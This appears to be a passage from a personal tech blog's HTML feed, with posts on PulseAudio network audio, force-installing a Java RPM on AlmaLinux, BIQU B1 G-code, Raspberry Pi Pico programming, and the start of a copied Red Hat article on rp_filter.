style="border-radius: 6px; box-sizing: border-box; color: #24292f; font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, "Liberation Mono", monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 16px; text-align: left;">$ <span style="font-size: 13.6px;"><b>pactl load-module module-native-protocol-tcp port=5555 listen=0.0.0.0
</b></span><i style="font-size: 13.6px;">24</i></pre><pre style="border-radius: 6px; box-sizing: border-box; line-height: 1.45; margin-bottom: 16px; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 16px;"><code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border-radius: 6px; border: 0px; box-sizing: border-box; display: inline; line-height: inherit; margin: 0px; overflow-wrap: normal; overflow: visible; padding: 0px; word-break: normal;"><span face="ui-monospace, SFMono-Regular, SF Mono, Menlo, Consolas, Liberation Mono, monospace" style="color: #24292f;"><span><span style="font-size: 13.6px;">$ </span><b style="font-size: 13.6px;">ss -tlpn src :5555</b><span style="font-size: 13.6px;">
</span><i><span style="font-size: 13.6px;">State Recv-Q Send-Q Local Addr:Port Peer Address:Port Process
</span></i></span></span></code><span style="color: #24292f;"><span style="font-size: 13.6px;"><i>LISTEN 0 5 0.0.0.0:5555 0.0.0.0:* users:(("pulseaudio",pid=3834,fd=40))</i></span></span></pre><h3 style="text-align: left;"><br />Server Side Script<br /><span style="font-weight: normal;">The following script could be used to load the native protocol module on the Server side.</span><br /><br /></h3><p><b>#/usr/bin/bash<br /># Load the pulse audio module to be server at $IP and $PORT</b></p><p><b>IP=192.168.1.120<br />PORT=5555<br />pactl load-module module-native-protocol-tcp port=$PORT listen=$IP</b></p><h3 style="text-align: left;"><b><br /></b></h3><h3 style="text-align: left;"><b>Server Side Firewall Considerations</b></h3><div>If you are using a firewall on the Server side you will need to allow access to the PORT you are listening on with the Server.</div><p><b># Service Side Using Uncomplicated Firewall (ufw) <br /></b><b>sudo ufw allow to any port 5555 proto tcp</b></p><p><b># Service Side Using Firewalld (firewall-cmd)<br /></b><b>sudo firewall-cmd --add-port 5555/tcp<br /></b><b>sudo firewall-cmd --add-port 5555/tcp --permanent</b></p><p><br /></p><h3 style="text-align: left;"><span face="-apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #24292f; font-size: 16px;">Client Sink Side</span></h3><p><span face="-apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #24292f; font-size: 16px;">On the Client side, where the audio is to be heard the following script will connect to the Server.</span></p><p><span style="color: #24292f;"><b>#/usr/bin/bash<br /></b></span><b style="color: #24292f;"># Connect to remote native protocol module server at IP and port</b></p><p><b style="color: #24292f;">IP=192.168.1.120<br /></b><b style="color: #24292f;">PORT=5555</b></p><p><b style="color: #24292f;">pactl load-module module-tunnel-sink server=tcp:$IP:$PORT</b></p><pre style="border-radius: 6px; box-sizing: border-box; line-height: 1.45; margin-bottom: 16px; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 16px;"><code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border-radius: 6px; border: 0px; box-sizing: border-box; display: inline; line-height: inherit; margin: 0px; overflow-wrap: normal; overflow: visible; padding: 0px; word-break: normal;"><span face="ui-monospace, SFMono-Regular, SF Mono, Menlo, Consolas, Liberation Mono, monospace" style="color: #24292f;"><span style="font-size: 13.6px;"><br /></span></span></code></pre>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-1430899701203001712022-09-29T21:53:00.003-07:002022-10-04T18:59:33.570-07:00Justified Use of RPM Force Option<p>I've rarely come across situations where using the force option with the rpm command like </p><p><span style="font-family: courier;">sudo rpm --force</span></p><p><span style="font-family: inherit;">was justified so I wanted to share this experience I had while using AlmaLinux 9.</span></p><p><span style="font-family: inherit;">Here is the situation. I failed to install the Java Runtime Environment from java.com. I thought because of the error it might safely be ignored. Even though the installer could not find paths like /bin/basename, I felt confident that those paths were valid. </span></p><p><span style="font-family: inherit;">I ran a few tests to gather the facts: </span></p><p>1. The path /bin/basename appears to be valid.
</p><pre><font color="#26A269"><b>keith@ryzen5</b></font>:<font color="#12488B"><b>/usr/lib/jvm</b></font>$ ls -l /bin/basename
-rwxr-xr-x. 1 root root 37016 Feb 14 2022 <font color="#26A269"><b>/bin/basename</b></font>
</pre>2. But /bin is empty.<pre><font color="#26A269"><b>keith@ryzen5</b></font>:<b style="color: #12488b;">/usr/lib/jvm</b>$ du -sh /bin</pre><pre>0 /bin</pre><pre><span style="font-family: "Times New Roman"; white-space: normal;">3. /bin is a soft link file referencing usr/bin.</span>
</pre><pre><pre><font color="#26A269"><b>keith@ryzen5</b></font>:<b style="color: #12488b;">/usr/lib/jvm</b>$ ls -l /bin<br />lrwxrwxrwx. 1 root root 7 Mar 25 2022 <font color="#2AA1B3"><b>/bin</b></font> -> <font color="#12488B"><b>usr/bin</b></font></pre><span style="font-family: "Times New Roman"; white-space: normal;"><pre><span style="font-family: "Times New Roman"; white-space: normal;">4. dnf fails to install the Java Runtime Environment since files expected to be in /bin are not there.</span></pre></span></pre><pre><font color="#26A269"><b>keith@ryzen5</b></font>:<font color="#12488B"><b>/usr/lib/jvm</b></font>$ sudo dnf install ~/Downloads/jre-8u341-linux-x64.rpm
Last metadata expiration check: 0:28:57 ago on Thu 29 Sep 2022 08:52:06 PM PDT.
Error:
Problem: conflicting requests
- nothing provides /bin/basename needed by jre1.8-1.8.0_341-fcs.x86_64
- nothing provides /bin/cp needed by jre1.8-1.8.0_341-fcs.x86_64
- nothing provides /bin/ls needed by jre1.8-1.8.0_341-fcs.x86_64
- nothing provides /bin/mkdir needed by jre1.8-1.8.0_341-fcs.x86_64
- nothing provides /bin/mv needed by jre1.8-1.8.0_341-fcs.x86_64
- nothing provides /bin/pwd needed by jre1.8-1.8.0_341-fcs.x86_64
- nothing provides /bin/sort needed by jre1.8-1.8.0_341-fcs.x86_64
(try to add '--skip-broken' to skip uninstallable packages or '--nobest' to use not only best candidate packages)
<br /><p style="font-family: "Times New Roman"; white-space: normal;"><span style="font-family: inherit;">5. The coreutils package no longer uses /bin as the directory where the core utilities like cp, ls, etc.</span></p><div><font color="#26A269"><b>keith@ryzen5</b></font>:<b style="color: #12488b;">/usr/lib/jvm</b>$ rpm -ql coreutils | grep /bin</div><pre>/usr<font color="#D08288"><b>/bin</b></font>/[
/usr<font color="#D08288"><b>/bin</b></font>/arch
/usr<font color="#D08288"><b>/bin</b></font>/b2sum
/usr<font color="#D08288"><b>/bin</b></font>/base32
/usr<font color="#D08288"><b>/bin</b></font>/base64
/usr<font color="#D08288"><b>/bin</b></font>/basename
/usr<font color="#D08288"><b>/bin</b></font>/basenc
/usr<font color="#D08288"><b>/bin</b></font>/cat
/usr<font color="#D08288"><b>/bin</b></font>/chcon
/usr<font color="#D08288"><b>/bin</b></font>/chgrp
/usr<font color="#D08288"><b>/bin</b></font>/chmod
/usr<font color="#D08288"><b>/bin</b></font>/chown
/usr<font color="#D08288"><b>/bin</b></font>/cksum
/usr<font color="#D08288"><b>/bin</b></font>/comm
/usr<font color="#D08288"><b>/bin</b></font>/cp
...
<br /></pre><pre><p style="font-family: "Times New Roman"; white-space: normal;"><span style="font-family: inherit;">6. Using the command rpm with </span>--force successfully <span style="font-family: inherit;">installs the JRE where dnf fails.</span></p><div><span style="font-family: inherit;"><br /></span></div></pre><font color="#26A269"><b>keith@ryzen5</b></font>:<font color="#12488B"><b>/usr/lib/jvm</b></font>$ sudo rpm -ivh --force ~/Downloads/jre-8u341-linux-x64.rpm
warning: /data/backup/keith/Downloads/jre-8u341-linux-x64.rpm: Header V3 RSA/SHA256 Signature, key ID ec551f03: NOKEY
Verifying... ################################# [100%]
Preparing... ################################# [100%]
Updating / installing...
1:jre1.8-1.8.0_341-fcs ################################# [100%]
Unpacking JAR files...
plugin.jar...
javaws.jar...
deploy.jar...
rt.jar...
jsse.jar...
charsets.jar...
localedata.jar...
</pre><pre><span style="font-family: "Times New Roman"; white-space: normal;">7. Java can now be configured to use the JRE that was installed using the alternatives command.</span></pre>
<pre><font color="#26A269"><b>keith@ryzen5</b></font>:<font color="#12488B"><b>/usr/lib/jvm</b></font>$ sudo alternatives --config java
There are 2 programs which provide 'java'.
Selection Command
-----------------------------------------------
*+ 1 java-11-openjdk.x86_64 (/usr/lib/jvm/java-11-openjdk-11.0.16.1.1-1.el9_0.x86_64/bin/java)
2 /usr/java/jre1.8.0_341-amd64/bin/java
Enter to keep the current selection[+], or type selection number: 2</pre><pre><br /></pre><pre><span style="font-family: "Times New Roman"; white-space: normal;">8. Alternatives has the correct configuration of the paths for java so the JRE is ready to run.</span></pre><pre><font color="#26A269"><b>keith@ryzen5</b></font>:<font color="#12488B"><b>/usr/lib/jvm</b></font>$ sudo alternatives --display java
java - status is manual.
link currently points to /usr/java/jre1.8.0_341-amd64/bin/java
/usr/lib/jvm/java-11-openjdk-11.0.16.1.1-1.el9_0.x86_64/bin/java - family java-11-openjdk.x86_64 priority 11001621
slave ControlPanel: (null)
slave alt-java: /usr/lib/jvm/java-11-openjdk-11.0.16.1.1-1.el9_0.x86_64/bin/alt-java
slave javaws: (null)
slave jcontrol: (null)
slave jjs: /usr/lib/jvm/java-11-openjdk-11.0.16.1.1-1.el9_0.x86_64/bin/jjs
slave keytool: /usr/lib/jvm/java-11-openjdk-11.0.16.1.1-1.el9_0.x86_64/bin/keytool
</pre>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-21378379611309215302021-12-15T18:02:00.000-08:002021-12-15T18:02:54.623-08:00BIQU B1 - 3D Printing for a Beginner<h3 style="text-align: left;"> An Affordable 3D Printer</h3><p>https://www.bigtree-tech.com/products/biqu-b1-3d-printer-tft35-v3-0-touch-screen-skr-v1-4-32-bit-dual-operation-system-diy-i3-3d-printer.html</p><h3 style="text-align: left;">BL Touch</h3><p>https://www.antclabs.com/bltouch-v3</p><p>https://github.com/tomoinn/Marlin/tree/tmo</p><p>https://kay3d.com/pages/bltouch-wiring-guide-for-bigtreetech-boards</p><p><br /></p><h3 style="text-align: left;">Key Specifications</h3><p>Max Print Speed: 100mm/s</p><p>Print Size 235w x 235 y 270z mm</p><p>Filaments: PLA, ABS, PETG</p><p><span style="white-space: pre;"> </span>Acrylonitrile Butadiene Styrene , Polyethylene Terephthalate Glycol , Polylactic Acid , Steel</p><p><br /></p><p>Leveling: Manual</p><p>Extruder: Single</p><p>Screen: 3.5" Color Touch Screen</p><p>Controller: 32 bit SKR V1.4 </p><h4 style="text-align: left;">G Code</h4><div>G Code originated with Computer Numerical Controlled (CNC) equipment. This code allows instructions for 3D movement, 3D printing operations, and miscellaneous configuration management is the low-level way to communicate to your 3D printer. </div><div><br /></div><div>I don't want to waste time writing what others have done so well in explaining the details further: <a href="https://all3dp.com/2/3d-printer-g-code-commands-list-tutorial/">https://all3dp.com/2/3d-printer-g-code-commands-list-tutorial/</a>.</div><div><br /></div><div>BIQU B1 Miscellaneous</div><div>M500 = Save Configuration to EEPROM</div><div>M501 = Read settings from EEPROM</div><div>M502 = Reset Configuration to Factory Defaults</div><div>M503 = Display Configuration</div><div><br /></div><div>M851 Z0 = Set Z Home to the current position</div><div>M211 S0 = Ignore software endstops</div><div>G1 F60 Z0 = Move Nozzle to Z Home</div><div>G28 Z0 = Move to Z Home</div><div>M851 Z -1.50 = Set Z Probe Offset</div><div><br /></div><div><br /></div><div>G29 = Home all axes</div><div><br /></div><div><div> * M104 (hotend, no wait) - high temp = none, low temp = stop timer</div><div> * M109 (hotend, wait) - high temp = start timer, low temp = stop timer</div><div> * M190 (bed, wait) - high temp = start timer, low temp = none</div><div> *</div><div> * The timer can also be controlled with the following commands:</div><div> *</div><div> * M75 - Start the print job timer</div><div> * M76 - Pause the print job timer</div><div> * M77 - Stop the print job timer</div></div><p><br /></p>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-78973296692292237562021-12-15T17:44:00.000-08:002021-12-15T17:44:36.926-08:00Programming the Raspberry Pi Pico<h2 style="text-align: left;">Getting Started the Pico Using Linux</h2><h3 style="text-align: left;">Using Linux</h3><div style="text-align: left;">Works with Ubuntu</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><pre><span style="color: #26a269;"><b>keith@i3</b></span>:<span style="color: #12488b;"><b>~</b></span>$ ls -l /dev/ttyACM*
crw-rw---- 1 root <span style="background-color: #fff2cc;">dialout</span> 166, 0 May 15 23:59 <span style="background-color: #171421;"><span style="color: #a2734c;"><b>/dev/ttyACM0</b></span></span>
<span style="color: #26a269;"><b>keith@i3</b></span>:<span style="color: #12488b;"><b>~</b></span>$ groups
keith adm cdrom sudo dip plugdev lpadmin lxd sambashare </pre><pre> </pre></div><div style="text-align: left;">Modifying Group Membership</div><div style="text-align: left;"> </div><div style="text-align: left;"><pre><span style="color: #26a269;"><b>keith@i3</b></span>:<span style="color: #12488b;"><b>~</b></span>$ sudo usermod -aG <span style="background-color: #fff2cc;">dialout</span> keith
<span style="color: #26a269;"><b>keith@i3</b></span>:<span style="color: #12488b;"><b>~</b></span>$ # logout and login or login again for group membership
<span style="color: #26a269;"><b>keith@i3</b></span>:<span style="color: #12488b;"><b>~</b></span>$ groups
keith adm cdrom sudo dip plugdev lpadmin lxd sambashare
<span style="color: #26a269;"><b>keith@i3</b></span>:<span style="color: #12488b;"><b>~</b></span>$ sudo su - keith
<span style="color: #26a269;"><b>keith@i3</b></span>:<span style="color: #12488b;"><b>~</b></span>$ groups
keith adm <span style="background-color: #fff2cc;">dialout</span> cdrom sudo dip plugdev lpadmin lxd sambashare
<span style="color: #26a269;"><b>keith@i3</b></span>:<span style="color: #12488b;"><b>~</b></span>$
</pre></div><div style="text-align: left;">For the modified group membership to take effect for every shell started, you should log out of the account and back in again.</div><div style="text-align: left;"> </div><div style="text-align: left;">Set Up Development Environment</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Thonny</div><div style="text-align: left;"><pre><span style="color: #26a269;"><b>keith@i3</b></span>:<span style="color: #12488b;"><b>~</b></span>$ sudo apt install python-is-python3 python3-tk
</pre></div><div style="text-align: left;"><pre><span style="color: #26a269;"><b>keith@i3</b></span>:<span style="color: #12488b;"><b>~</b></span>$ sudo pip3 install thonny </pre><pre><span style="color: #26a269;"><b>keith@i3</b></span>:<span style="color: #12488b;"><b>~</b></span>$ thonny & </pre><pre> </pre></div><div style="text-align: left;"><br /></div><h3 style="text-align: left;">Python or C</h3><div>With Python, you'll get a simple but powerful language and find libraries of modules that can be used to work with devices easily. With C, you'll get a complex language with nearly limitless control over the Pico and hardware connected to it.</div><div><br /></div><h3 style="text-align: left;">CircuitPython or MicroPython</h3><div>boot.py</div><div>code.py</div><div>main.py</div><h3 style="text-align: left;">CircuitPython Firmware</h3><div><a href="https://circuitpython.org/board/raspberry_pi_pico/">https://circuitpython.org/board/raspberry_pi_pico</a></div><div><br /></div><div><div>CircuitPython is a beginner friendly, open source version of Python for tiny, inexpensive computers called microcontrollers. Microcontrollers are the brains of many electronics including a wide variety of development boards used to build hobby projects and prototypes. </div><div><br /></div><div>CircuitPython features unified Python core APIs and a growing list of 150+ device libraries and drivers that work with it. These libraries also work on single board computers with regular Python via the Adafruit Blinka Library.</div></div><div><br /></div><div>code.py</div><div><h3>MicroPython Firmware</h3></div><div>Since the Raspberry Pi team uses the MicroPython in their examples, if you want to load these examples and have them work without hacking it yourself, then you should load the MicroPython firmware onto the Pico.</div><div><br /></div><div><div>Currently, supported features include:</div><div>• REPL over USB and UART (on GP0/GP1).</div><div>• 1600 kB filesystem using littlefs2 on the onboard flash. (Default size for Raspberry Pi Pico)</div><div>• utime module with sleep and ticks functions.</div><div>• ubinascii module.</div><div>• machine module with some basic functions.</div><div>◦ machine.Pin class.</div><div>◦ machine.Timer class.</div><div>◦ machine.ADC class.</div><div>◦ machine.I2C and machine.SoftI2C classes.</div><div>◦ machine.SPI and machine.SoftSPI classes.</div><div>◦ machine.WDT class.</div><div>◦ machine.PWM class.</div><div>◦ machine.UART class.</div><div>• rp2 platform-specific module.</div><div>◦ PIO hardware access library</div><div>◦ PIO program assembler</div><div>◦ Raw flash read/write access</div><div>• Multicore support exposed via the standard _thread module</div><div>• Accelerated floating-point arithmetic using the RP2040 ROM library and hardware divider (used automatically)</div><div>Documentation around MicroPython is available from <a href="https://docs.micropython.org">https://docs.micropython.org</a>. For example, the machine module, which can be used to access a lot of RP2040’s on-chip hardware, is standard, and you will find a lot of the information you need in the online documentation for that module.</div></div><div><br /></div><div>main.py?</div><div>boot.py</div><div><br /></div><h3 style="text-align: left;">Using rshell</h3><div>pip install rshell</div><div><br /></div><div><pre><font color="#4E9A06"><b>/home/keith</b></font>> help
Documented commands (type help <topic>):
========================================
args cat connect date edit filesize help mkdir rm shell
boards cd cp echo exit filetype ls repl rsync
Use Control-D (or the exit command) to exit rshell.
<br class="Apple-interchange-newline" /><font color="#4E9A06"><b>/home/keith</b></font>&gt; repl
Entering REPL. Use Control-X to exit.
&gt;</pre><pre>MicroPython v1.14 on 2021-03-05; Raspberry Pi Pico with RP2040
</pre><pre>Type "help()" for more information.
>>>
>>> help()
Welcome to MicroPython!
For online help please visit https://micropython.org/help/.
For access to the hardware use the 'machine' module. RP2 specific commands
are in the 'rp2' module.
Quick overview of some objects:
machine.Pin(pin) -- get a pin, eg machine.Pin(0)
machine.Pin(pin, m, [p]) -- get a pin and configure it for IO mode m, pull mode p
methods: init(..), value([v]), high(), low(), irq(handler)
machine.ADC(pin) -- make an analog object from a pin
methods: read_u16()
machine.PWM(pin) -- make a PWM object from a pin
methods: deinit(), freq([f]), duty_u16([d]), duty_ns([d])
machine.I2C(id) -- create an I2C object (id=0,1)
methods: readfrom(addr, buf, stop=True), writeto(addr, buf, stop=True)
readfrom_mem(addr, memaddr, arg), writeto_mem(addr, memaddr, arg)
machine.SPI(id, baudrate=1000000) -- create an SPI object (id=0,1)
methods: read(nbytes, write=0x00), write(buf), write_readinto(wr_buf, rd_buf)
machine.Timer(freq, callback) -- create a software timer object
eg: machine.Timer(freq=1, callback=lambda t:print(t))
Pins are numbered 0-29, and 26-29 have ADC capabilities
Pin IO modes are: Pin.IN, Pin.OUT, Pin.ALT
Pin pull modes are: Pin.PULL_UP, Pin.PULL_DOWN
Useful control commands:
CTRL-C -- interrupt a running program
CTRL-D -- on a blank line, do a soft reset of the board
CTRL-E -- on a blank line, enter paste mode
For further help on a specific object, type help(obj)
For a list of available modules, type help('modules')</pre><pre>>>> </pre><pre>>>> help('modules')
__main__ gc uasyncio/event ujson
_boot machine uasyncio/funcs uos
_onewire math uasyncio/lock urandom
_rp2 micropython uasyncio/stream ure
_thread onewire ubinascii uselect
_uasyncio rp2 ucollections ustruct
builtins uarray uctypes usys
ds18x20 uasyncio/__init__ uhashlib utime
framebuf uasyncio/core uio uzlib
Plus any modules on the filesystem
>>> dir(machine)
['__class__', '__name__', 'ADC', 'I2C', 'PWM', 'PWRON_RESET', 'Pin', 'SPI', 'SoftI2C', 'SoftSPI', 'Timer', 'UART', 'WDT', 'WDT_RESET', 'bootloader', 'deepsleep', 'disable_irq', 'enable_irq', 'freq', 'idle', 'lightsleep', 'mem16', 'mem32', 'mem8', 'reset', 'reset_cause', 'soft_reset', 'time_pulse_us', 'unique_id']
>>> dir(rp2)
['__class__', '__name__', 'const', 'Flash', 'PIO', 'StateMachine', 'asm_pio_encode', 'PIOASMError', 'PIOASMEmit', '_pio_funcs', 'asm_pio']
</pre><br /></div><div><div>>>> <span style="background-color: #ffd966;">machine.bootloader() # reboot the Pico into USB UDF mode without pressing a button!</span></div><div><span style="background-color: #ffd966;"><br /></span></div><div>autoconnect: /dev/ttyACM0 action: remove</div><div><br /></div><div>USB Serial device '/dev/ttyACM0' disconnected</div></div><div><br /></div><div><br /></div><div><br /></div><h3 style="text-align: left;">MicroPython for RP2</h3><div>
<pre>MicroPython v1.14 on 2021-03-05; Raspberry Pi Pico with RP2040
Type "help()" for more information.
>>>
>>> help()
Welcome to MicroPython!
For online help please visit https://micropython.org/help/.
For access to the hardware use the 'machine' module. RP2 specific commands
are in the 'rp2' module.
Quick overview of some objects:
machine.Pin(pin) -- get a pin, eg machine.Pin(0)
machine.Pin(pin, m, [p]) -- get a pin and configure it for IO mode m, pull mode p
methods: init(..), value([v]), high(), low(), irq(handler)
machine.ADC(pin) -- make an analog object from a pin
methods: read_u16()
machine.PWM(pin) -- make a PWM object from a pin
methods: deinit(), freq([f]), duty_u16([d]), duty_ns([d])
machine.I2C(id) -- create an I2C object (id=0,1)
methods: readfrom(addr, buf, stop=True), writeto(addr, buf, stop=True)
readfrom_mem(addr, memaddr, arg), writeto_mem(addr, memaddr, arg)
machine.SPI(id, baudrate=1000000) -- create an SPI object (id=0,1)
methods: read(nbytes, write=0x00), write(buf), write_readinto(wr_buf, rd_buf)
machine.Timer(freq, callback) -- create a software timer object
eg: machine.Timer(freq=1, callback=lambda t:print(t))
Pins are numbered 0-29, and 26-29 have ADC capabilities
Pin IO modes are: Pin.IN, Pin.OUT, Pin.ALT
Pin pull modes are: Pin.PULL_UP, Pin.PULL_DOWN
Useful control commands:
CTRL-C -- interrupt a running program
CTRL-D -- on a blank line, do a soft reset of the board
CTRL-E -- on a blank line, enter paste mode
For further help on a specific object, type help(obj)
For a list of available modules, type help('modules')
>>> dir(machine)
['__class__', '__name__', 'ADC', 'I2C', 'PWM', 'PWRON_RESET', 'Pin', 'SPI', 'SoftI2C', 'SoftSPI', 'Timer', 'UART', 'WDT', 'WDT_RESET', 'bootloader', 'deepsleep', 'disable_irq', 'enable_irq', 'freq', 'idle', 'lightsleep', 'mem16', 'mem32', 'mem8', 'reset', 'reset_cause', 'soft_reset', 'time_pulse_us', 'unique_id']
>>> dir(rp2)
['__class__', '__name__', 'const', 'Flash', 'PIO', 'StateMachine', 'asm_pio_encode', 'PIOASMError', 'PIOASMEmit', '_pio_funcs', 'asm_pio']
</pre><br /></div><h3 style="text-align: left;"><br /></h3><h3 style="text-align: left;">MicroPython for Unix</h3><div>I kept getting an error trying to make the Linux port of MicroPython for the Pico, as <br />
<pre><font color="#4E9A06"><b>keith@fossa</b></font>:<font color="#3465A4"><b>~/pico/micropython/ports/unix</b></font>$ make
Use make V=1 or set BUILD_VERBOSE in your environment to increase build verbosity.
make: *** No rule to make target 'lib/axtls/ssl/asn1.c', needed by 'build-standard/genhdr/qstr.i.last'. Stop.
<font color="#4E9A06"><b>keith@fossa</b></font>:<font color="#3465A4"><b>~/pico/micropython/ports/unix</b></font>$ cd ../..
<font color="#4E9A06"><b>keith@fossa</b></font>:<font color="#3465A4"><b>~/pico/micropython</b></font>$ git submodule update --init lib/axtls lib/berkeley-db-1.xx
Submodule 'lib/axtls' (https://github.com/pfalcon/axtls) registered for path 'lib/axtls'
Submodule 'lib/berkeley-db-1.xx' (https://github.com/pfalcon/berkeley-db-1.xx) registered for path 'lib/berkeley-db-1.xx'
Cloning into '/home/keith/pico/micropython/lib/axtls'...
Cloning into '/home/keith/pico/micropython/lib/berkeley-db-1.xx'...
Submodule path 'lib/axtls': checked out '43a6e6bd3bbc03dc501e16b89fba0ef042ed3ea0'
Submodule path 'lib/berkeley-db-1.xx': checked out '35aaec4418ad78628a3b935885dd189d41ce779b'
<font color="#4E9A06"><b>keith@fossa</b></font>:<font color="#3465A4"><b>~/pico/micropython</b></font>$ cd -
/home/keith/pico/micropython/ports/unix
<font color="#4E9A06"><b>keith@fossa</b></font>:<font color="#3465A4"><b>~/pico/micropython/ports/unix</b></font>$ make
Use make V=1 or set BUILD_VERBOSE in your environment to increase build verbosity.
mkdir -p build-standard/genhdr
GEN build-standard/genhdr/mpversion.h
</pre></div><div><br /><pre><font color="#4E9A06"><b>keith@fossa</b></font>:<font color="#3465A4"><b>~/pico/micropython/ports/unix</b></font>$ ls
alloc.c fatfs_port.c main.c modffi.c modtermios.c modusocket.c mpbtstackport_h4.c mphalport.h mpthreadport.h
<font color="#3465A4"><b>build-standard</b></font> gccollect.c Makefile modjni.c modtime.c mpbthciport.c mpbtstackport_usb.c mpnimbleport.c qstrdefsport.h
coverage.c input.c <font color="#4E9A06"><b>micropython</b></font> modmachine.c moduos_vfs.c mpbtstackport_common.c mpconfigport.h mpnimbleport.h unix_mphal.c
coveragecpp.cpp input.h micropython.map modos.c moduselect.c mpbtstackport.h mpconfigport.mk mpthreadport.c <font color="#3465A4"><b>variants</b></font>
<font color="#4E9A06"><b>keith@fossa</b></font>:<font color="#3465A4"><b>~/pico/micropython/ports/unix</b></font>$ ./micropython
MicroPython v1.14-83-g680ce4532 on 2021-03-04; linux version
Use Ctrl-D to exit, Ctrl-E for paste mode
>>> dir()
['__name__']
>>> help()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'help' isn't defined
>>> help(modules)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'help' isn't defined
>>> dir('__builtins__')
['__class__', 'count', 'endswith', 'find', 'format', 'index', 'isalpha', 'isdigit', 'islower', 'isspace', 'isupper', 'join', 'lower', 'lstrip', 'replace', 'rfind', 'rindex', 'rsplit', 'rstrip', 'split', 'startswith', 'strip', 'upper', 'center', 'encode', 'partition', 'rpartition', 'splitlines']
>>>
</pre></div><div>
<h3>Getting Started with C</h3><div style="text-align: left;">The steps for getting started with the C SDK from Raspberry Pi: <a href="https://datasheets.raspberrypi.org/pico/getting-started-with-pico.pdf" target="_blank">https://datasheets.raspberrypi.org/pico/getting-started-with-pico.pdf </a></div><div style="text-align: left;"> </div><div style="text-align: left;"> <br /></div><h3>C in Visual Studio Code</h3></div>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-51089795022032940432021-10-21T19:23:00.000-07:002021-10-21T19:23:13.176-07:00Using rp_filter sysctls to Mitigate DDOS Attacks<p> </p><header class="header" style="background-color: white; box-sizing: border-box; color: #252525; font-family: "Red Hat Text", RedHatText, "Helvetica Neue", Arial, sans-serif; font-size: 16px; margin-bottom: 1.875rem;"><h1 class="title" style="box-sizing: border-box; color: inherit; font-family: "Red Hat Display", RedHatDisplay, "Helvetica Neue", Arial, sans-serif; font-size: 1.875rem; font-weight: 500; line-height: 1.25em; margin: 0px 0px 0.375rem; text-rendering: auto;">When RHEL has multiple IPs configured, only one is reachable from a remote network. Or why does RHEL ignore packets when the route for outbound traffic differs from the route of incoming traffic?</h1></header><section class="field_kcs_environment_txt" style="background-color: white; box-sizing: border-box; color: #252525; font-family: "Red Hat Text", RedHatText, "Helvetica Neue", Arial, sans-serif; font-size: 16px; margin-bottom: 1.875rem;"><h2 style="box-sizing: border-box; color: inherit; font-family: "Red Hat Display", RedHatDisplay, "Helvetica Neue", Arial, sans-serif; font-size: 1.625rem; font-weight: 300; line-height: 1.5em; margin-bottom: 0.625rem; margin-top: 0px; text-rendering: auto;">Environment</h2><ul style="box-sizing: border-box; margin-bottom: 1rem; margin-top: 0px;"><li style="box-sizing: border-box;">Red Hat Enterprise Linux (RHEL) 6, 7, 8</li></ul></section><section class="field_kcs_issue_txt" style="background-color: white; box-sizing: border-box; color: #252525; font-family: "Red Hat Text", RedHatText, "Helvetica Neue", Arial, sans-serif; font-size: 16px; margin-bottom: 1.875rem;"><h2 style="box-sizing: border-box; color: inherit; font-family: "Red Hat Display", RedHatDisplay, "Helvetica Neue", Arial, sans-serif; font-size: 1.625rem; font-weight: 300; line-height: 1.5em; margin-bottom: 0.625rem; margin-top: 0px; text-rendering: auto;">Issue</h2><ul style="box-sizing: border-box; margin-bottom: 1rem; margin-top: 0px;"><li style="box-sizing: border-box;">Why does Red Hat Enterprise Linux 6 invalidate / discard packets when the route for outbound traffic differs from the route of incoming traffic?</li><li style="box-sizing: border-box;">Why does Red Hat Enterprise Linux 6 differ from Red Hat Enterprise Linux 5 in handling asymmetrically routed packets?</li><li style="box-sizing: border-box;">Why does Red Hat Enterprise Linux not respond to connection attempts to a second NIC?</li></ul></section><section class="field_kcs_resolution_txt" style="background-color: white; box-sizing: border-box; color: #252525; font-family: "Red Hat Text", RedHatText, "Helvetica Neue", Arial, sans-serif; font-size: 16px; margin-bottom: 1.875rem;"><h2 style="box-sizing: border-box; color: inherit; font-family: "Red Hat Display", RedHatDisplay, "Helvetica Neue", Arial, sans-serif; font-size: 1.625rem; font-weight: 300; line-height: 1.5em; margin-bottom: 0.625rem; margin-top: 0px; text-rendering: auto;">Resolution</h2><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;"><span style="box-sizing: border-box; font-weight: 700;">Before making this change please see the Root Cause section of this article to understand what it does and review alternative solutions.</span></p><p style="box-sizing: border-box; line-height: 1.5em; margin: 0px 0px 1rem;">Set the <code style="background-color: whitesmoke; border-radius: 0px; box-sizing: border-box; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 14.4px; padding: 0.125rem 0.25rem; white-space: nowrap;">net.ipv4.conf.all.rp_filter</code> kernel tunable parameter value to <code style="background-color: whitesmoke; border-radius: 0px; box-sizing: border-box; font-family: Consolas, Monaco, "Andale Mono", monospace; font-size: 14.4px; padding: 0.125rem 0.25rem; white-space: nowrap;">2</code>:</p><div class="code-raw" style="box-sizing: border-box; position: relative;"><div class="code-raw-toolbar" style="background: rgb(237, 237, 237); border: 0.0625rem solid 